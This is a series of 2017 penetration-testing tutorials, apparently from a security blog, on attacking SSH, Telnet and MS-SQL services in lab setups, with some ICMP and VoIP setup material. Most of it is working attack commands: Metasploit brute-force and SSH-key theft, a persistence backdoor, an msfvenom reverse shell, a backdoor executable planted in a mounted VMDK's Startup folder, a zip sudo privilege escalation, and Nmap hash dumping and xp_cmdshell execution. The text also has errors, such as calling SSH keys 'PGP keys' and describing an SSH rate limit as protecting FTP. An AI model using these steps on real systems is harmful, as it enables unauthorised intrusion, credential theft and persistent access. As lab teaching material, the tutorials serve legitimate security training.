SSH Penetration Testing (Port 22)

October 4, 2017, 2:24 am

≫ Next: Telnet Pivoting through Meterpreter

≪ Previous: VNC Pivoting through Meterpreter

Probing through every open port is practically the first step hackers take in order to prepare their attack. And in order to work one is required keep their port open but at the same time they are threatened by the fear of hackers. Therefore, one must learn to secure their ports even if they are open.

Requirement

Attacker: kali Linux

Target: ubuntu system (install ssh and putty-tools)

Client: Window systems (install putty and putty genrator)

In this article we will secure SSH port so that even if it’s open no one will be able to exploit it. First of all let’s install SSH server using following command:
sudo apt-get install openssh-server

sudo apt-get install putty-tools

Once the server is installed start SSH service by typing:

service ssh start

To confirm the working of SSH, use the following command:

service ssh status

Configure this port using PUTTY. For configuration in putty, give the IP address in host name along with port number and then select SSH and then finally click on Open.

Upon opening, it will ask for password, give the said password and press enter.

SSH Banner Grabbing

As the service of SSH is started, scan it in your kali using nmap:

nmap -sV 192.168.1.17

Scanning will show that on port 22 is open with the service of SSH.

Type msfconsole to Load metasploit framework and use given below exploit for fetching SSH banner.

auxiliary/scanner/ssh/ssh_version

msf auxiliary(ssh_version) > set rhosts 192.168.1.17

msf auxiliary(ssh_version) > set rport 22

msf auxiliary(ssh_version) > exploit

From given below image you can confirm that it has grab SSH banner.

An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.

Prevention against Banner Grabbing

As we had discussed above how a banner grabbing can expose loopholes of any software or service running on remote system therefore after installing any service always hide their software versions.

Admin should make following changes in their configuration file to prevent banner information.

· Open sshd_config file

· Add a new line “DebianBanner no” as shown in given image.

Save the whole text file after modification as shown in given image. Now it will not disclose banner information and restart the service using following command.

service SSH start

Let’s verify version of running service after hiding banner through nmap version scan.

nmap -p 21 -sV 192.168.1.17

Wonderful!! We are successful in hiding banner which you can confirm from given image.

Exploit SSH through Brute Force Attack

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) >set rhost 192.168.1.17

msf auxiliary(ssh_login) >set rport 22

msf auxiliary(ssh_login) >set userpass_file /root/Desktop/ssh.txt

msf auxiliary(ssh_login) >exploit

Great!! We had not only successfully found valid SSH credential raj: 123 but also got victim command shell session 1 as unauthorized access in target system.

From given below image you can see we have check the victims network interface by executing ifconfig command through session 1.

Now I had executed following command which converted command shell session in to meterpreter session.

sessions -u 1

sessions

Hence you can see here I have owned two sessions 1^stfor command shell and 2^ndfor meterpreter.

SSH Connection using PGP Keys

This way we have applied our first measure of security. Now for our second measure of security download and install PUTTY Key Generator. Open it and click on Generate button on low right side.

This will generate a public and private key. Out of these save the private key.

The private key will be saved as shown in following image. You can rename it at convenience as I have named it ssh login key.

Now open terminal of your server and type:

ssh-keygen

The above command will create a folder named .ssh and then create an empty text file with the name authorized_keys in the same folder.

Copy the “ssh login key.ppk” file which are created previously into the .ssh folder.

In the terminal, move into .ssh folder and type the following command:

puttygen –L “ssh login key.ppk”

This command will generate a key. Copy this key in the empty file which we created earlier with the authorized_keys.

Then in putty configuration tab, go to data and give Auto-login username

The open SSH>Auth and give the path of SSH login key (private key that was generated).

And then in session tab give the IP address and port number. And then click on open.

It will open without asking for password as you have configured the key.

But this doesn’t mean it can’t be open using password. And still we are vulnerable to hackers.

Exploit SSH by Stealing PGP KEY

If you have already exploited target and have its meterpreter session as exploit above then you can use following post exploit for stealing authorized keys.

This module will collect the contents of all users' .ssh directories on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.

use post/multi/gather/ssh_creds

msf post(ssh_creds) >set session 1

msf post(ssh_creds) >exploit

From given below image you can see we have got all authorized keys store in /.sshdirectory now use those keys for login into SSH server.

Create permanent backdoor

This module will add an SSH key to a specified user (or all), to allow remote login via SSH at any time

Use post/linux/manage/sshkey_persistence

msf post(sshkey_persistence) > set session 1

msf post(sshkey_persistence) >exploit

Now whenever host will alive attacker can connect to his system without exploiting again and again due to this permanent backdoor.

Secure Against SSH PGP key Auto login

Therefore we are going to apply third measure of security i.e. to disable password completely. For this, go to computer>etc>sshd_config.

Here, change password authentication from yes (as shown the image above) to no and uncomment (as shown in image below).

And now that we have successfully applied three measures of security our port is safe from anyone and everyone. To this port the hacker will require physical access to you hardware which is impossible. And if you want to access SSH from another machine then just configure the same key in that PC too and it have access to it.

Prevention against brute force attack

A threshold account lockout policy in windows which locked an account after certain numbers of attempt that can be possible in UNIX also through Iptables chain rule.

Here admin can set iptable chain rules for certain number of login attempts and if user crossed the define number then account will get locked for some time period as specified by admin.

Type the given below command to set iptable chain rule for account lockout policy:

iptables -I INPUT -p tcp –dport 22 -i eth0 -m state –state NEW -m recent –set

iptables -I INPUT -p tcp –dport 22 -i eth0 -m state –state NEW -m recent –update –seconds 120 –hitcount 3 -j DROP

Now this above rule will allow only 3 chances for login into FTP server otherwise locked the account for 120 seconds (2 minutes).

service vsftpd restart

Let’s ensure iptable chain rule working by making brute force attack as above.

Great!! It has prevented by stopping brute force after 3 attempts but will get activated after 2 minute therefore admin should locked the account for long period of time.

Secure SSH through port forward

Now that SSH has been configured. We can use our first measure of security i.e. port forwarding. In computer>etc>ssh you will find a file with the name of “sshd_config”.

Open this file and wherever it says port 22, change it to port 2222.

This way we have forwarded SSH service from port 22 to port 2222. Let’s check it on nmap to confirm.

nmap -sV 192.168.1.17

↧

Telnet Pivoting through Meterpreter

October 6, 2017, 9:19 am

≫ Next: Understanding Guide to ICMP Protocol with Wireshark

≪ Previous: SSH Penetration Testing (Port 22)

In our previous tutorial we had discussed on SSH pivoting and today we are going to discuss Telnet pivoting.

From Offensive Security

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.

Lab Setup requirement:

Attacker machine: Kali Linux

Pivot Machine (client): window operating system with two network interface

Target Machine: Ubuntu server (Allow telnet service)

Exploit pivot machine

Use exploit MS17-010 or multi handler to hack the pivot machine.

sessions

From given image you can confirm that I owned pivot machine (192.168.1.107) meterpreter session1.

Verify network interface of pivot

Check network interface through following command:

Meterpreter> ifconfig

From given image you can observe two networks interface in pivot’s system 1^st for IP 192.168.1.107 through which attacker is connected and 2^nd for IP 10.0.0.20 through which telnet server (targets) are connected.

Route Add

Since attacker belongs to 192.168.1.1 interface and target belongs to 10.0.0.0 interface therefore it is not possible to directly make attack on target network until unless the attacker acquires same network connection. In order to achieve 10.0.0.0 network attacker need run the post exploitation “autoroute”.

use post/multi/manage/autoroute

msf post(autoroute) > set session 1

msf post(autoroute) > exploit

This Module will perform an ARP scan for a given IP range through a Meterpreter Session.

use post/windows/gather/arp_scanner

msf post(arp_scanner) > set rhosts 10.0.0.1-30

msf post(arp_scanner) > set session 1

msf post(arp_scanner) > set thread 20

msf post(arp_scanner) > exploit

Here we found a new IP 10.0.0.10 as shown in given image. Let’s perform TCP port scan for activated services on this machine.

This module Enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set ports 23

msf auxiliary(tcp) > set rhosts 10.0.0.1

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) >exploit

From given you can observe port 23 is open and we know that port 23 is used for telnet service.

Use Telnet login Brute Force Attack

An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Now type following command to Brute force TELNET login:

use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set rhosts 10.0.0.10

msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt

msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(telnet_login) > exploit

From given image you can observe that TELNET server is not secure against brute force attack because it is showing matching combination of username: aarti and password: 123 for login simultaneously it has opened victims command shell as session 2

Let’s count the number of victim sessions we have hold using following command:

sessions

From given image you can observe there are two sessions 1^st as meterpreter session of windows system and 2^ndas command shell of telnet server.

sessions 2

Now attacker is command shell of server, let’s verify through network configuration.

Ifconfig

From given you can observe the network IP is 10.0.0.10

↧

Understanding Guide to ICMP Protocol with Wireshark

October 7, 2017, 10:30 am

≫ Next: Lab Setup for VOIP Penetration Testing

≪ Previous: Telnet Pivoting through Meterpreter

From Wikipedia

The Internet Control Message Protocol (ICMP) is a supporting protocol in the Internet protocol suite. It is used by network devices, including routers, to send error messages and operational information which indicates that a requested service is not available or that a host or router could not be reached.

It is layer 3 i.e. network layer protocol used by the ping command for sending message through ICMP payload which is encapsulated with IP Header packet. According to MTU the size of ICMP packet cannot be greater than 1500 bytes.

ICMP packet at Network layer

IP header	ICMP header	ICMP payload size	MTU (1500)
20 bytes	8 bytes	1472 bytes (maximum)	20 + 8 + 1472 = 1500

ICMP packet at Data Link layer

Ethernet header	IP header	ICMP header	ICMP payload size	MTU (1514)
14	20 bytes	8 bytes	1472 bytes (maximum)	14 + 20 + 8 + 1472 = 1514

ICMP Message code & Packet description with Wireshark

ICMP message contains two types of codes i.e. query and error.

Query:The query messages are the information we get from a router or another destination host.

For example given below message types are some ICMP query codes:

• Type 0 = Echo Reply

• Type 8 = Echo Request

• Type 9 = Router Advertisement

• Type 10 = Router Solicitation

• Type 13 = Timestamp Request

• Type 14 = Timestamp Reply

A ping command sends an ICMP echo request to the target host. The target host responds with an echo Reply which means target host is alive.

Here we are going to test how ping command helps in identifying alive host by Pinging host IP.

Ping 192.168.0.105

From the given below image you can see reply from host; now notice few more things as given below:

• Default size of payload sent by source machine is 32 bytes (request)

• Same size of payload received by source machine is 32 bytes from Destination machine (reply)

• TTL = 128 which means host machine is windows system.

• Total packets are 8, 4 packet of request and 4 of reply.

Look over the sequence of packet transfer between source and destination captured through wireshark.

Total numbers of packet captured is 8, 4 for request and 4 for reply between source and destination machine.

The 1^st packet is send by source machine is ICMP echo request and if you look by the given below image, you will observe highlighted text is showing ICMP query code: type 8 echo ping request.

Length of frame is 74 now as explained in the below table:

Ethernet header	IP header	ICMP header	ICMP payload size	MTU (1514)
14	20 bytes	8 bytes	32 (default)	14+20+8+32=74

Similarly given below image is showing details of 2^ndpacket i.e. Echo reply, you can observe that the highlighted text is showing ICMP query code: type 0 echo ping reply.

Error:The error statement messages reports problem which a router or a destination host may generate.

For example: given below message types are some of the ICMP error codes:

• Type 3 = Destination Unreachable

• Type 4 = Source Quench

• Type 5 = Redirect

• Type 11 = Time Exceeded

• Type 12 = Parameter Problems

When we ping an IP sometime we don't get echo ping reply from the host machine, instead of that we get some reply such asdestination unreachable or time exceeded this is known as ICMP error reporting message. There are so many reasons behind such kind of error message, possibily a host in a network is down or firewall is blocking your ping request.

Ping 192.168.0.102

From the given below image you can see reply from host to destination port is unreachable.

The 1^st packet send by source machine is ICMP echo request and if you observe by the given below image the highlighted text is showing ICMP query code: type 8 echo ping request.

Similarly given below image is showing detail of 2^nd packet i.e. Destination unreachable, you can observe that it is showing ICMP error code: type 3.

ping –a 192.168.0.105

-a : Resolve IP addresses to host-name, identify's that reverse name resolution is carried out on the host IP address. If it is successful, ping shows the matching host name.

From the given below image you can observe that, instead of ICMP protocol the ping request has been send through NBNS (NetBIOS Name service)protocol through port 137 which is a UDP port.

After applying UDP filter you can read host name captured by wireshark “WIN-1GKSSJ7D2AE” is the part of workgroup.

By default a ping send's 4 packet of request and receives same number of packet as reply from the host. You can increase or decrease this number of packet by using given below command.

ping –n 2 192.168.0.105

-n: Number of echo requests to send

As we had set -n as 2 packets of request hence we got two packet as reply.

Similarly we can also set TTL (Time to Live) for echo request packet, by default 4 packet of request query are sent from source machine at the rate of 1 millisecond per packet. Suppose we want to give TTL between two packets, set -i as 5ms so that after the first packet is delivered the second packet is sent after 5ms.

Ping –i 5 192.168.0.105

-i TTL: Time To Live

Let’s verify TTL for packet sent from source to destination though wireshark. Now if you observe by the given below image you will notice that every echo ping request packet has TTL 5 but every echo reply has default TTL value i.e.128.

ICMP payload description through Wireshark

As we have discuss above default size of ICMP payload is 32 bytes and maximum is 1472, if the size of payload packet is greater than 1472 then packet get's fragmented into small packets.

From the given below image you can observe source has pinged the host which carries default 32 bytes size payload.

Now let check the information payload carries from source to destination using wireshark. From the given below image you can read that highlighted texts are alphabets that has been used as 32 bytes payload.

The alphabet is the combination 26 letters but in 32 bytes payload, they are used as:

abcd------uvw are 23 letter only 9 letter needed more to complete 32 bytes therefore again it included 9 alphabets more i.e. abcdefghi

You can reset the size of payload using following command that will carry echo ping request from source to destination.

ping -l 33 192.168.0.105

As we have seen above the 32 bytes payload carry data in the form of alphabets abcd----uvw and then abcd—hi. Hence if the size of payload is 33 then data should start from abcd----uvw and then abcd—hij. Alphabet “j” must be the last payload of data packet.

From the given image you can confirm that Alphabet “j”is the last payload of data packet, In this way increasing the payload size will add an alphabet letter into data packet.

Length of frame has become 75 now as shown in below table:

Ethernet header	IP header	ICMP header	ICMP payload size	MTU (1514)
14	20 bytes	8 bytes	33 (default)	14+20+8+33=75

Now we are sending maximum size of payload using following command.

Ping -l 1472 192.168.0.105

From the given below image you can see reply from host machine.

According to MTU if the size of payload is set to 1472 then frame size will become 1514 as explain above, let’s verify it from wireshark. From given below image you can read length of frame is 1514 and highlighted text is showing data of 1472 bytes payload.

When the size of payload is greater than 1472 or too large for a network to hold and reach at a router, the router breaks it into smaller packets (fragments).

ping –l 1473 192.168.0.105

From the given below image you can see now size of payload is 1473 which carries echo ping request from source to destination.

From the given image you can confirm that when payload is more than 1472 ICMP packet it gets fragmented as per below table:

Ethernet header	IP header	ICMP header	ICMP payload size	MTU (1514)
14	20 bytes	8 bytes	1472	14+20+8+1472=1514
14	20	-	1	35

If you separate Ethernet header and IP header the size of payload will be 1480 bytes as shown below.

Using –f option with ping command will not allow packet fragmentation in network.

ping –f –l 1472 192.168.0.105

-f: Set Don't Fragment flag in packet

From the given below image you can observe remote host has set (don’t) fragment flag which will not allow router to fragment the payload packets. More over 1472 bytes payload didn’t need fragmention by router.

If the packet size 1473 is set with (don’t) fragment flag with ping, the router will reject the packet and will display an ICMP message that the packet needs to be fragmeted because of MTU size limit of 1500 bytes

IP header	ICMP header	ICMP payload size	MTU (1500)
20 bytes	8 bytes	1473 bytes (without fragment)	More than 1500 bytes Not possible

↧

Lab Setup for VOIP Penetration Testing

October 9, 2017, 7:45 am

≫ Next: Post Exploitation in VMDK with Meterprter

≪ Previous: Understanding Guide to ICMP Protocol with Wireshark

Hello friends! Today you will learn how to setup VOIP in virtual machine using tribox 2.8.0.4iso image for making phone calls and sending text messages in local network.

From Wikipedia

Voice over Internet Protocol (also voice over IP, VoIP or IP telephony) is a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet.

Let’s start!!

Open vmware, select option “creates new virtual machine”, now for install from wizard select third option:

I will install operating system later

Then click on next.

Now select 2^nd option “Linux” for guest operating system and select version “ubuntu”. Then click on next and next as per your requirements.

Explore custom hardware for making following changes:

Click on CD/DVD to browse ISO file “tribox 2.8.0.4”.

Select bridges connection and enable the check box for replicate connection for network adapter setting.

Then click on finish.

Trixbox is the world's most popular Asterisk-based distribution. Trixbox enables even the novice user to quickly set up a voice over IP phone system and other necessary applications such as mysql and more. Trixbox can be configured to handle a single phone line for a home user, several lines for a small office, or several T1s for a million minute a month call center.

It will start rebooting the vm automatically, now for TRIBOX CE installation follow given below steps:

A dialog box will appear for selecting option keyboard type, here chose option “US” as given in below image. Then click on OK tab.

Another dialog fox will ask to choose time zone, select Asia/ Kolkata. Then click on OK tab.

Now enter the password you want to give for root user. I had given tribox as password. Again type confirm password and then click on OK tab.

Now it will start installation process automatically which will take some time as shown in given below image. Do not disturb installation until it becomes 100 % completely.

Once installation will complete it will ask for login. Type username: root and password:tribox

Check network interface using “ifconfig” command, now from here I came to know my vm IP: 192.168.1.128.

Now open this IP: 192.168.1.218 in web browser. Here through Tribox GUI we are going to create some users account by assigning them extension number. For example you received 8 digit numbers for your land-line from service providers.

By default tribox GUI open with user mode and for creating extension number we need to switch into admin mode.

Click on switchoption for user mode given on top of right corner.

The authentication is required for login into admin mode of tribox.

Now enter username: maint and password: password as admin credential.

You will get a pop up message for tribox registration, close this message.

At tribox platform you will see server status, now click on PBX option and select PBX setting option from given menu.

Under setup list of adminselect extensions option as basic setup.

Select device

Now follow given below steps for creating an extension inside the server:

Device: generic SIP device

Click on submit

Add extension

User extension: 1234567 (any 7 digit number)

Display name: ignite (name of user/ customer you want assign this number)

Device options

Secret: 123

Dtmfmode: rfc2833

Once you have enter the information for creating a new extension click on submit.

Similarly create one more extension so then we can check communication between both extensions.

From given image you can see now we had configured two extension 1^st for ignite [1234567] and 2^nd for raj[12345678].

We had created two extensions one as caller and other as receiver. You can create multiple extension as per your requirement.

Now click on orange color tile for apply configuration changes to put them into effect.

A pop will open here select continue with reload

Now this is all about server installation and configuration of extension inside it.

Now download ZOIPER application in your system

Zoiper is a VoIP softphone that lets you send messages, make voice and video calls with your friends, family, colleagues and business partners.

Once it is downloaded it will look like as given below image, now go with setting option for configuration of an account which will be able to make call or receive call from another user.

Select account type SIPand click on next.

If you remember in tribox GUI we had add an extension 1234567 for ignite now enter those information in account wizard in order to save it as new contact.

Now enter user number with server IP as given below

1234567@192.168.1218

Enter password for this account of your own choice.

Click on next.

It will auto detect the account name as shown in given image. Then click on next.

Your one account has been created in accounted list. Now ignite will be able to make calls or receive calls from another users.

We have already created ignite account in system through zoiper for making and receiving calls. Now we need to install zoiper on other device for other users also, who will be able to make or receive call from ignite.

Download zoiper from Google play stores in your android phone. Run the application after installation.

Click on config icon for configuration of a new account in your phone as shown in given image and select Accounts option from given list of configuration.

Then a new window will open click on add account. A dialog box will appear for account setup click on YES.

Now again a new dialog box will pop up select manual configuration for account setup.

Go forSIP as account type you have chose.

Now enter following information for SIP account setting:

Account name: raj

Host: 192.168.1.218

Username: 12345678

Password: 123

Now click on save.

You can see from given image that account for raj is ready.

Hence we have setup two accounts in zoiper one will act as caller let say raj is caller making call to ignite through his phone and ignite will be receiver and get incoming call on system from raj.

As you know we had configured two extension one for ignite another for raj. Now we are going to test this VOIP setup by making call from raj.

Raj had made call to ignite by dialing his number 1234567 and when you will perform this you will hear the outgoing bell from your phone.

Ignite will get incoming call on system as shown in given image. Click on answer for accepting call from raj.

From given screenshot you can see that the call is connected and raj and ignite is having conversation over VOIP call.

Great!!! Hence in this way you can configure your VOIP server for local network and can communicate with multiple users by making calls or chat.

↧

Post Exploitation in VMDK with Meterprter

October 10, 2017, 10:17 am

≫ Next: MS-Sql Penetration Testing lab Setup

≪ Previous: Lab Setup for VOIP Penetration Testing

Hello friends!! Today you will how to exploit any operation system running inside the virtual machine.

Requrement

Attacker: kali linux

Target: VM image windows server 2012

First attacker needs to exploit actual operating system of victim PC and attain the meterpreter session with admin privileges.

From given image you can perceive I have seize windows 10 meterpreter session and also gained admin privileges.

Meterpreter > sysinfo

When you install any operating system in your vmware workstation then all its hardware and network setting get store as .vmx file in actual operating system in order to create new virtual image.

Type following for making search of .vmx file stored in it

Meterpreter > search –f *.vmx –r

From given image you can perceive that it has dump the all location where .vmx files are stored.

Using cat command you can read the content of file as these file simple text document which contain vm setting information.

We had opened windows server 2012 vm image through cat command.

Meterpreter > cat “d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx”

Here from given below image you can read the details of this file which is describing network and hardware setting.

This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots or clones are linked from the file.

use post/windows/manage/vmdk_mount

msf post(vmdk_mount) > set DEL_LCK true

msf post(vmdk_mount) > set READ_MODE false

msf post(vmdk_mount) > set session 2

msf post(vmdk_mount) > set VDK_PATH “d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx”

msf post(vmdk_mount) > run

Great!! We have successfully mount vmdk file of windows server2012.

meterpreter > show_mount

Now from given below image you can read the information of each drives.

Now using given below command I will upload an exe backdoor in L:drive which will give us reverse connection of windows server 2012 when it will be running inside vm workstation.

Meterpreter > upload /root/Desktop/abc.exe “L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup”

use exploit/multi/handler

msf exploit(handler) >set payload windows/meterpreter/reverse_tcp

msf exploit(handler) >set lhost 192.168.1.113

msf exploit(handler) >set lport 445

msf exploit(handler) >run

Awesome!! We have successfully exploited windows server2012 virtual machine and gained its meterpreter session.

Meterpreter >sysinfo

↧

MS-Sql Penetration Testing lab Setup

October 11, 2017, 4:25 am

≫ Next: Hack the Zico2 VM (CTF challenge)

≪ Previous: Post Exploitation in VMDK with Meterprter

Hello friends!! Today you will learn how to install and configure MS SQL server in windows 10 operating system.

Requirement:

1. Download setup file ENU\x64\SQLEXPR_x64_ENU.exe

2. Download setup file ENU\x86\SQLManagementStudio_x86_ENU.exe from here

3. Download heidisql tool

Configure SQL express setup

Open the 1st download file for SQL server installation and run as administration. Click on installation then go with New SQL server standalone installation.

To install sql server2012 follow given below three steps:

· License terms

· Product updates

· Install setup files

Here enable the check box for “I accept the license terms” and click on next.

Enable the check box for “Include SQL server product updates” to enhance the SQL server security and performance. It found 26 MB setup online which will get install when you will click on next.

Now it will start installing SQL server setup file on your system which takes some time. As soon as setup gets installed you will get new window screen of feature selection for your SQL server.

Feature Selection

Now select the features you want to install from given image you can see I had enable check boxfor following features.

· Database Engine service

· SQL Server Replication

· SQL Client Connective SDK

Click on next.

Instance Configuration

Specify the name and instance ID for instance of SQL server. The directory structure, registry structure, and service names all replicate the instance name and a specific instance ID. Instance ID becomes part of installation path.

· Enter SQLExpress in text filed for Name Instance

· Enter SQLExpress in text filed for Instance ID

After then click on next

You can select Default Instance also if an instance of SQL Server is not installed previously. It does not need a user to give the name of the instance to create a connection.

Instance Configuration

· Enter SQLExpress in text filed for Name Instance

· Enter SQLExpress in text filed for Instance ID

After then click on next

You can select Default Instance also if an instance of SQL Server is not installed previously. It does not need a user to give the name of the instance to create a connection.

Your SQL server 2012 installation completed successfully, here you can check the status for installed features.

Now open the SQL server configuration manger where you will see left and right panel.

Click on protocol for SQLExpress in left panel and then after select protocol name “TCP/IP” in right panel.

Under IP Addresses specify TCP port 1433 tab, Click on Apply and Enable the TCP/IP.

Configure SQL Management Studio setup

Now open 2nd downloaded application for SQL server management setup and add new feature in it.

No updates for SQL server 2012 click on next.

Installation type

Since we have already created instance “SQLExpress” now we can add featured in SQLExpress instance of SQL server 2012.

From given below image you can observe the table for installed instance. Click on next

Feature selection

For installation of instance feature enable the check box for Management tool basic as shared featured then click on next and next.

Management tool basic installation completed successfully, here you can check the status for installed features. Click on installation then go with New SQL server standalone installation.

Now login into SQL Server using admin credential and click on connect.

Once you are login into SQL server then Explore security folder and create a new login account for other users.

Enter the user name as I had given “ignite” and set password by choosing sql server authentication for this user.

From given image you can observe that master is default database.

Connect to server

Run heidisql tool to connect with MS SQL Server through Ignite user as given below:

Network type: TCP/IP

Hostname /IP: 192.168.1.104

User: ignite

Password: 123456

Port: 1433

HeidiSQL is a useful and reliable tool designed for web developers using the popular MySQLserver, Microsoft SQL databases and PostgreSQL. It enables you to browse and edit data, create and edit tables, views, procedures, triggers and scheduled events.

Now click on open

Grate!! We have successfully access the database system of MSSQL server. You can modify or create new table or new database and much more things.

↧

Hack the Zico2 VM (CTF challenge)

October 13, 2017, 9:13 am

≫ Next: MSSQL Peneration Testing using Nmap

≪ Previous: MS-Sql Penetration Testing lab Setup

Hello friends! Today we are going to take another CTF challenge known as Zico2. The credit for making this vm machine goes to “Rafael” and it is another boot2root challenge, where we have to root the system to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.26 but you will have to find our own)

Netdiscover

Use nmap for port enumeration.

Nmap –sV 192.168.0.26

We find port 80 is open, so we open this ip in our browser.

Browsing through the site we find that, this site is vulnerable to LFI.

We couldn’t find anything special here so we use dirb to find directories.

dirb http://192.168.0.26/

We found an interesting link called dbadmin. We open it in our browser.

We find another link; this link leads us to phpliteadmin login page.

We tried the password” admin”, and it granted us access.

We find that this version of phpliteadmin is vulnerable to php code injection.

So we create another database and named it shell.php we use this database to inject php code.

After we inject our code we use LFI to execute our shell. Here we can see that using ls command was executed when we execute our shell.

Now we create executable file using msfvenom.

msfvenom –p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.25 lport=4444 –f elf > /root/Desktop/shell

We move it to /var/www/html/ and then setup our listener on metasploit.

We then use php code injection to upload our file to the server, make it executable, and execute the file.

We execute the file using LFI and get a reverse shell.

After searching through the files we find password for user zico in /home/zico/worpress/wp-config.php

We use this password to login through ssh.

After searching through the files, we take loot at the sudoers and find that we are allowed to use a few commands as root.

Now we move to /tmp folder and find a few files that we had uploaded. We use zip to gain root privilege by executing shell command along with zip.

sudo –u root zip shell.zip shell.py –T –unzip-command=”sh –c /bin/bash”

After gaining root privilege we move to root folder. Inside the root folder we find a file called flag.txt when we open the file. We get greeted by a message congratulating for the completion of the challenge.

↧

MSSQL Peneration Testing using Nmap

October 13, 2017, 10:07 am

≫ Next: 4 ways to Capture NTLM Hashes in Network

≪ Previous: Hack the Zico2 VM (CTF challenge)

Hello friends! Today we are going to perform Microsoft SQL penetration testing using NMAP scripts in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article we had setup Microsoft SQL server in Windows 10.

Requirement

Attacker: kali Linux (NMAP)

Target:Windows 10 (MS SQL Server)

Lets start!!

Scan port 1433

Open the terminal in kali linux and scan target IP for port 1433 using nmap command.

nmap -p 1433 192.168.1.104

From given below image you can observe that port 1433 is openfor MS-SQL service.

Enumerating version information

Given below command will attempt to determine configuration and version information for Microsoft SQL Server instances.

nmap -p 1433 --script ms-sql-info 192.168.1.104

In specified below image you can observe the install version and details of MS-SQL server.

Brute Force Attacker

Given below command will attempt to determine username and password through brute force attack against MS-SQL by means of username and password dictionary.

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104

In specfied image you can observe that we had successfully retrieve credential for two users:

· Username: ignite and password:12345

· Username: sa and password:123

Execute MS-SQL Query

Once you have retrieved the login credential use these credential in NMAP script to execute MS –SQL query. Given below will try to execute certain query “sp_database” against Microsoft SQL server.

Specified query “sp_databases” is part of record Stored Procedures and dump a list of database names from an instance of the SQL Server.

nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query=“sp_databases” 192.168.1.104

Hence as result it has dumped two database names “ignite & master” whereas master is the default database name of MS_SQL server.

Check Microsoft SQL server configuration

Following command will attempt to describe Microsoft SQL server configuration setting by passing login credential as argument through nmap script.

nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

Hence you can check configuration setting from given below image.

Obtain list of tables

Following command will attempt to fetch list of tables from inside Microsoft SQL server by passing login credential as argument through nmap script.

nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=admin123

192.168.1.104

Hence you can check list of tables from given below image.

Enumerate NetBIOS information

Given below NMAP script will enumerate information from remote Microsoft SQL services with NTLM authentication enabled.

Sending a MS-TDS NTLM authentication request with an invalid domain and null credentials will cause the remote service to respond with a NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.

nmap -p 1433 --script ms-sql-ntlm-info 192.168.1.104

Hence from given below image you can read the NETBIOS information remote Microsoft SQL server.

Dump password hashes

Following command will dump the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-the-ripper. In order to do so the user needs to have the appropriate DB privileges.

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From given image you can observe that it has dumped the hash value of passwords of user: sawhich we have enumerated above.

Identify database owner

Following command will execute a query against Microsoft SQL Server instances for a list of databases a user has access to. In order to do so the user needs to have the appropriate DB privileges. Therefore we have passes username and password as argument through NMAP script.

nmap -p 1433 --script ms-sql-hashdbaccess --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

In specified image you can observe that it showing user sais owner the database “ignite”.

Ms-SQL Allows XP_cmdshell option

The xp_cmdshell is a function of Microsoft SQL Server that allows system administrators to execute operating system command. By default, the xp_cmdshell option is disabled.

From given below image you can see we had enable the xp_cmdshell function by executing following statement inside master database.

EXEC sp_configure ‘xp_cmdshell’;

Now save above configuration setting through following statement:

RECONFIGURE;

Exploit XP_cmdshell Function

Now following NMAP script will attempt to run a command using the command shell of Microsoft SQL Server if found xp_cmdshell is enabled in targeted server.

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From given image you can confirm that we have executed OS command: net user as retrieve user account.

Blank password lead to unauthorized access

If the admin of Microsoft-SQL Server left the password Blank for login then attacker can director login into database server, from given below image you can see we are exploring the property of a user’s account “sa”.

Here kept “blank space” as password for user “sa”. As we know by default sa is admin of MS-SQL server and now its password is blank space therefore chances of making unauthorized access into server by attacker will get increases.

Make unauthorized access into SQL server

Following NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

nmap -p 1433 --script ms-sql-empty 192.168.1.104

From given below image you can perceive we had made successfully login with user: sa and empty password.

↧

4 ways to Capture NTLM Hashes in Network

October 15, 2017, 7:39 am

≫ Next: Hack the Lazysysadmin VM (CTF challenge)

≪ Previous: MSSQL Peneration Testing using Nmap

